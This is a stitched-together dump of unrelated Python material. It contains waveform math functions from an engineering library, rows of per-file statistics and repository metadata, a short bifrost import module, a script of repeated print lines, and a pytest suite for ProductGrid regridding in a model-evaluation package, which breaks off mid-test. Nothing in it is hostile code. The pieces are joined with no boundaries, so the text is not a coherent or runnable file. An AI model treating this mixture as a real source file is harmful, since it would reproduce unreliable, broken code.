@pexdoc.pcontracts.contract(wave=Waveform)
def tan(wave):
r"""
Return the tangent of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for peng.wave_functions.tan
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
return _operation(wave, "tan", "", np.tan)
@pexdoc.pcontracts.contract(wave=Waveform)
def tanh(wave):
r"""
Return the hyperbolic tangent of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.tanh
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
return _operation(wave, "tanh", "", np.tanh)
@pexdoc.pcontracts.contract(wave=Waveform)
def wcomplex(wave):
r"""
Convert a waveform's dependent variable vector to complex.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.wcomplex
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
ret = copy.copy(wave)
ret._dep_vector = ret._dep_vector.astype(np.complex)
return ret
@pexdoc.pcontracts.contract(wave=Waveform)
def wfloat(wave):
r"""
Convert a waveform's dependent variable vector to float.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.wfloat
:raises:
* RuntimeError (Argument \`wave\` is not valid)
* TypeError (Cannot convert complex to float)
.. [[[end]]]
"""
pexdoc.exh.addex(
TypeError,
"Cannot convert complex to float",
wave._dep_vector.dtype.name.startswith("complex"),
)
ret = copy.copy(wave)
ret._dep_vector = ret._dep_vector.astype(np.float)
return ret
@pexdoc.pcontracts.contract(wave=Waveform)
def wint(wave):
r"""
Convert a waveform's dependent variable vector to integer.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.wint
:raises:
* RuntimeError (Argument \`wave\` is not valid)
* TypeError (Cannot convert complex to integer)
.. [[[end]]]
"""
pexdoc.exh.addex(
TypeError,
"Cannot convert complex to integer",
wave._dep_vector.dtype.name.startswith("complex"),
)
ret = copy.copy(wave)
ret._dep_vector = ret._dep_vector.astype(np.int)
return ret
@pexdoc.pcontracts.contract(wave=Waveform, indep_var="number")
def wvalue(wave, indep_var):
r"""
Return the dependent variable value at a given independent variable point.
If the independent variable point is not in the independent variable vector
the dependent variable value is obtained by linear interpolation
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param indep_var: Independent variable point for which the dependent
variable is to be obtained
:type indep_var: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.wvalue
:raises:
* RuntimeError (Argument \`indep_var\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* ValueError (Argument \`indep_var\` is not in the independent
variable vector range)
.. [[[end]]]
"""
close_min = np.isclose(indep_var, wave._indep_vector[0], FP_RTOL, FP_ATOL)
close_max = np.isclose(indep_var, wave._indep_vector[-1], FP_RTOL, FP_ATOL)
pexdoc.exh.addex(
ValueError,
"Argument `indep_var` is not in the independent variable vector range",
bool(
((indep_var < wave._indep_vector[0]) and (not close_min))
or ((indep_var > wave._indep_vector[-1]) and (not close_max))
),
)
if close_min:
return wave._dep_vector[0]
if close_max:
return wave._dep_vector[-1]
idx = np.searchsorted(wave._indep_vector, indep_var)
xdelta = wave._indep_vector[idx] - wave._indep_vector[idx - 1]
ydelta = wave._dep_vector[idx] - wave._dep_vector[idx - 1]
slope = ydelta / float(xdelta)
return wave._dep_vector[idx - 1] + slope * (indep_var - wave._indep_vector[idx - 1])
| 30.807447
| 88
| 0.659579
| 8,171
| 62,878
| 4.937584
| 0.054094
| 0.032718
| 0.028752
| 0.032272
| 0.847664
| 0.820672
| 0.786268
| 0.7739
| 0.744479
| 0.731937
| 0
| 0.004304
| 0.220347
| 62,878
| 2,040
| 89
| 30.822549
| 0.818677
| 0.598413
| 0
| 0.360738
| 0
| 0
| 0.070116
| 0
| 0
| 0
| 0
| 0.02402
| 0
| 1
| 0.092282
| false
| 0
| 0.016779
| 0
| 0.211409
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b7d9e2f7e9f7f3d1c46eeebd4f9ccc51bc4b34e
| 80
|
py
|
Python
|
bifrost/bifrost/stonne/tiles/__init__.py
|
axelstjerngren/bifrost
|
78f46d51b51b2ea6e4aa62336c052217700d7d35
|
[
"MIT"
] | 1
|
2021-08-30T22:28:57.000Z
|
2021-08-30T22:28:57.000Z
|
bifrost/bifrost/stonne/tiles/__init__.py
|
axelstjerngren/bifrost
|
78f46d51b51b2ea6e4aa62336c052217700d7d35
|
[
"MIT"
] | null | null | null |
bifrost/bifrost/stonne/tiles/__init__.py
|
axelstjerngren/bifrost
|
78f46d51b51b2ea6e4aa62336c052217700d7d35
|
[
"MIT"
] | null | null | null |
from .conv_tiles_config import conv_tiles
from .fc_tiles_config import fc_tiles
| 26.666667
| 41
| 0.875
| 14
| 80
| 4.571429
| 0.428571
| 0.28125
| 0.53125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 80
| 2
| 42
| 40
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0bac3929401bdf58179247faa0a8558acc5f3854
| 232
|
py
|
Python
|
photo/photo_album.py
|
bidemiokus/pythonautomation
|
ed5a750aaf5640630026755adff7ae833d1226b4
|
[
"Apache-2.0"
] | null | null | null |
photo/photo_album.py
|
bidemiokus/pythonautomation
|
ed5a750aaf5640630026755adff7ae833d1226b4
|
[
"Apache-2.0"
] | null | null | null |
photo/photo_album.py
|
bidemiokus/pythonautomation
|
ed5a750aaf5640630026755adff7ae833d1226b4
|
[
"Apache-2.0"
] | null | null | null |
print("Here are the photos")
print("Here are the photos")
print("Here are the photos")
print("Here are the photos")
print("Here are the photos")
print("Here are the photos")
print("Here are the photos")
print("Here are the photos")
| 25.777778
| 28
| 0.724138
| 40
| 232
| 4.2
| 0.125
| 0.428571
| 0.571429
| 0.714286
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.137931
| 232
| 8
| 29
| 29
| 0.84
| 0
| 0
| 1
| 0
| 0
| 0.655172
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 14
|
f00188bd016146b8138ec99f5b5d95cf1e5e72c5
| 28,906
|
py
|
Python
|
tests/unit/test_grid_methods.py
|
actris-cloudnet/model-evaluation
|
c505bc54d8797011db28cf2bc7f0bbb8ba0fc36c
|
[
"MIT"
] | null | null | null |
tests/unit/test_grid_methods.py
|
actris-cloudnet/model-evaluation
|
c505bc54d8797011db28cf2bc7f0bbb8ba0fc36c
|
[
"MIT"
] | null | null | null |
tests/unit/test_grid_methods.py
|
actris-cloudnet/model-evaluation
|
c505bc54d8797011db28cf2bc7f0bbb8ba0fc36c
|
[
"MIT"
] | null | null | null |
import numpy as np
import numpy.ma as ma
import numpy.testing as testing
import pytest
from model_evaluation.products.model_products import ModelManager
from model_evaluation.products.observation_products import ObservationManager
from model_evaluation.products.grid_methods import ProductGrid
MODEL = 'ecmwf'
OUTPUT_FILE = ''
PRODUCT = 'iwc'
@pytest.mark.parametrize("product, variables", [
("iwc", ("ecmwf_iwc", "iwc_ecmwf", "iwc_att_ecmwf", "iwc_rain_ecmwf",
"iwc_adv_ecmwf", "iwc_att_adv_ecmwf", "iwc_rain_adv_ecmwf")),
("cf", ("ecmwf_cf", "cf_A_ecmwf", "cf_V_ecmwf", "cf_A_adv_ecmwf",
"cf_V_adv_ecmwf")),
("lwc", ("lwc_ecmwf", "lwc_ecmwf", "lwc_adv_ecmwf"))])
def test_generate_regrid_product(model_file, obs_file, product, variables):
obs = ObservationManager(product, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, product)
ProductGrid(model, obs)
for var in variables:
assert var in model.data.keys()
@pytest.mark.parametrize("key, value",[
("iwc", 3), ("lwc", 1), ("cf", 2)])
def test_get_method_storage(key, value, model_file, obs_file):
obs = ObservationManager(key, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, key)
obj = ProductGrid(model, obs)
x, y = obj._get_method_storage()
assert len(x.keys()) == value
@pytest.mark.parametrize("key, value",[
("iwc", 3), ("lwc", 1), ("cf", 2)])
def test_get_method_storage_adv(key, value, model_file, obs_file):
obs = ObservationManager(key, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, key)
obj = ProductGrid(model, obs)
x, y = obj._get_method_storage()
assert len(y.keys()) == value
@pytest.mark.parametrize("name", ['cf_V', 'cf_A'])
def test_cf_method_storage(name, model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
x, y = obj._cf_method_storage()
assert name in x.keys()
@pytest.mark.parametrize("name", ['cf_V_adv', 'cf_A_adv'])
def test_cf_method_storage_adv(name, model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
x, y = obj._cf_method_storage()
assert name in y.keys()
@pytest.mark.parametrize("name",
['iwc', 'iwc_att', 'iwc_rain'])
def test_iwc_method_storage(name, model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
x, y = obj._iwc_method_storage()
assert name in x.keys()
@pytest.mark.parametrize("name",
['iwc_adv', 'iwc_att_adv', 'iwc_rain_adv'])
def test_iwc_method_storage_adv(name, model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
x, y = obj._iwc_method_storage()
assert name in y.keys()
def test_product_method_storage(model_file, obs_file):
obs = ObservationManager('lwc', str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
obj = ProductGrid(model, obs)
x, y = obj._product_method_storage()
assert 'lwc' in x.keys()
def test_product_method_storage_adv(model_file, obs_file):
obs = ObservationManager('lwc', str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
obj = ProductGrid(model, obs)
x, y = obj._product_method_storage()
assert 'lwc_adv' in y.keys()
def test_regrid_cf_area(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
data = ma.array([[1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 0]])
dict = {'cf_A': np.zeros((1, 1))}
dict = obj._regrid_cf(dict, 0, 0, data)
x = dict['cf_A']
assert x[0, 0] == 0.75
def test_regrid_cf_none(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
data = None
dict = {'cf_A': np.zeros((1, 1))}
dict = obj._regrid_cf(dict, 0, 0, data)
x = dict['cf_A']
assert np.isnan(x[0, 0])
def test_regrid_cf_area_masked(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
data = ma.array([[1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 0]])
data[1,:] = ma.masked
dict = {'cf_A': np.zeros((1, 1))}
dict = obj._regrid_cf(dict, 0, 0, data)
x = dict['cf_A']
assert round(x[0, 0], 3) == 0.667
def test_regrid_cf_area_all_masked(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
data = ma.array([[1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 0]])
data[:, :] = ma.masked
dict = {'cf_A': np.zeros((1, 1))}
dict = obj._regrid_cf(dict, 0, 0, data)
x = dict['cf_A']
testing.assert_equal(x, np.nan)
def test_regrid_cf_area_nan(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
data = ma.array([[1, np.nan, 1], [0, 1, 1], [np.nan, 0, 1], [0, 0, 0]])
dict = {'cf_A': np.zeros((1, 1))}
dict = obj._regrid_cf(dict, 0, 0, data)
x = dict['cf_A']
assert x[0, 0] == 0.75
def test_regrid_cf_area_all_nan(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
data = ma.array([[np.nan, np.nan, np.nan], [np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan], [np.nan, np.nan, np.nan]])
dict = {'cf_A': np.zeros((1, 1))}
dict = obj._regrid_cf(dict, 0, 0, data)
x = dict['cf_A']
testing.assert_equal(x, 0.0)
def test_regrid_cf_volume(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
data = ma.array([[1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 0]])
dict = {'cf_V': np.zeros((1, 1))}
dict = obj._regrid_cf(dict, 0, 0, data)
x = dict['cf_V']
assert x[0, 0] == 0.5
def test_regrid_cf_volume_nan(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
data = ma.array([[1, np.nan, 1], [0, 1, 1], [np.nan, 0, 1], [0, 0, 0]])
dict = {'cf_V': np.zeros((1, 1))}
dict = obj._regrid_cf(dict, 0, 0, data)
x = dict['cf_V']
assert x[0, 0] == 0.5
def test_regrid_cf_volume_all_nan(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
data = ma.array([[np.nan, np.nan, np.nan], [np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan], [np.nan, np.nan, np.nan]])
dict = {'cf_V': np.zeros((1, 1))}
dict = obj._regrid_cf(dict, 0, 0, data)
x = dict['cf_V']
testing.assert_equal(x, np.nan)
def test_regrid_cf_volume_masked(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
data = ma.array([[1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 0]])
data[1, :] = ma.masked
dict = {'cf_V': np.zeros((1, 1))}
dict = obj._regrid_cf(dict, 0, 0, data)
x = dict['cf_V']
assert round(x[0, 0], 3) == 0.444
def test_regrid_cf_volume_all_masked(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
data = ma.array([[1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 0]])
data[:, :] = ma.masked
dict = {'cf_V': np.zeros((1, 1))}
dict = obj._regrid_cf(dict, 0, 0, data)
x = dict['cf_V']
testing.assert_equal(x, np.nan)
def test_reshape_data_to_window(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
xnd = np.array([1, 1, 1, 0, 0, 0])
ynd = np.array([1, 1, 0, 0])
ind = np.array([[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
obj._obs_data = np.array([[1, 2, 3, 4],
[11, 22, 33, 44],
[111, 222, 333, 444],
[5, 6, 7, 8],
[55, 66, 77, 88],
[555, 666, 777, 888]])
x = obj._reshape_data_to_window(ind, xnd, ynd)
compare = np.array([[1, 2], [11, 22], [111, 222]])
testing.assert_array_almost_equal(x, compare)
def test_reshape_data_to_window_middle(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
xnd = np.array([0, 0, 1, 1, 1, 0])
ynd = np.array([0, 1, 1, 0])
ind = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 0, 0, 0]], dtype=bool)
obj._obs_data = np.array([[1, 2, 3, 4],
[11, 22, 33, 44],
[111, 222, 333, 444],
[5, 6, 7, 8],
[55, 66, 77, 88],
[555, 666, 777, 888]])
x = obj._reshape_data_to_window(ind, xnd, ynd)
compare = np.array([[222, 333], [6, 7], [66, 77]])
testing.assert_array_almost_equal(x, compare)
def test_reshape_data_to_window_empty(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
xnd = np.array([1, 1, 1, 0, 0, 0, ])
ynd = np.array([0, 0, 0, 0])
ind = np.array([1, 1, 0, 0], dtype=bool)
x = obj._reshape_data_to_window(ind, xnd, ynd)
assert x is None
def test_regrid_iwc(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 3]])
dict = {'iwc': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc']
testing.assert_almost_equal(x[0, 0], 1.4)
def test_regrid_iwc_nan(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, 1, np.nan, 1],
[2, np.nan, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, np.nan]])
dict = {'iwc': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc']
testing.assert_almost_equal(x[0, 0], 1.5)
def test_regrid_iwc_all_nan(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[np.nan, np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan, np.nan]])
dict = {'iwc': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc']
testing.assert_almost_equal(x[0, 0], np.nan)
def test_regrid_iwc_masked(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 4]])
obj._obs_data[1, :] = ma.masked
dict = {'iwc': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc']
testing.assert_almost_equal(x[0, 0], 1.0)
def test_regrid_iwc_all_masked(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 4]])
obj._obs_data[:, :] = ma.masked
dict = {'iwc': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc']
testing.assert_almost_equal(x[0, 0], np.nan)
def test_regrid_iwc_none(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 4]])
dict = {'iwc': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc']
testing.assert_equal(x[0, 0], np.nan)
def test_regrid_iwc_att(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
dict = {'iwc_att': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc_att']
testing.assert_almost_equal(x[0, 0], 0.018)
def test_regrid_iwc_att_masked(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
obj._obs_obj.data['iwc_att'][:].mask = ma.array([[1, 0, 1, 0],
[0, 1, 1, 0],
[1, 0, 0, 1],
[0, 1, 1, 1],
[1, 1, 0, 0],
[0, 1, 0, 1]], dtype=bool)
dict = {'iwc_att': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc_att']
testing.assert_almost_equal(x[0, 0], 0.018)
def test_regrid_iwc_att_all_masked(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
obj._obs_obj.data['iwc_att'][:].mask = ma.array([[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]], dtype=bool)
dict = {'iwc_att': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc_att']
testing.assert_almost_equal(x[0, 0], np.nan)
def test_regrid_iwc_att_none(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
dict = {'iwc_att': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc_att']
assert np.isnan(x[0, 0])
def test_regrid_iwc_rain(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 3]])
dict = {'iwc_rain': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 0, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 0, 1, 1]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc_rain']
testing.assert_almost_equal(x[0, 0], 2.3)
def test_regrid_iwc_rain_nan(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, np.nan, 1, 1],
[2, 2, 2, np.nan],
[3, 3, 3, 3],
[np.nan, 4, 4, np.nan]])
dict = {'iwc_rain': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 0, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 0, 1, 1]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc_rain']
testing.assert_almost_equal(round(x[0, 0], 3), 2.429)
def test_regrid_iwc_rain_all_nan(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[np.nan, np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan, np.nan]])
dict = {'iwc_rain': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 0, 1, 1]], dtype=bool)
no_rain = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 0, 1, 1]], dtype=bool)
dict = obj._regrid_iwc(dict, 0, 0, ind, no_rain)
x = dict['iwc_rain']
testing.assert_almost_equal(x[0, 0], np.nan)
def test_regrid_iwc_rain_masked(model_file, obs_file):
obs = ObservationManager(PRODUCT, str(obs_file))
model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
obj = ProductGrid(model, obs)
obj._obs_data = ma.array([[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 4]])
obj._obs_data[2, :] = ma.masked
dict = {'iwc_rain': np.zeros((1, 1))}
ind = ma.array([[0, 1, 1, 1],
[0, 0, 1, 1],
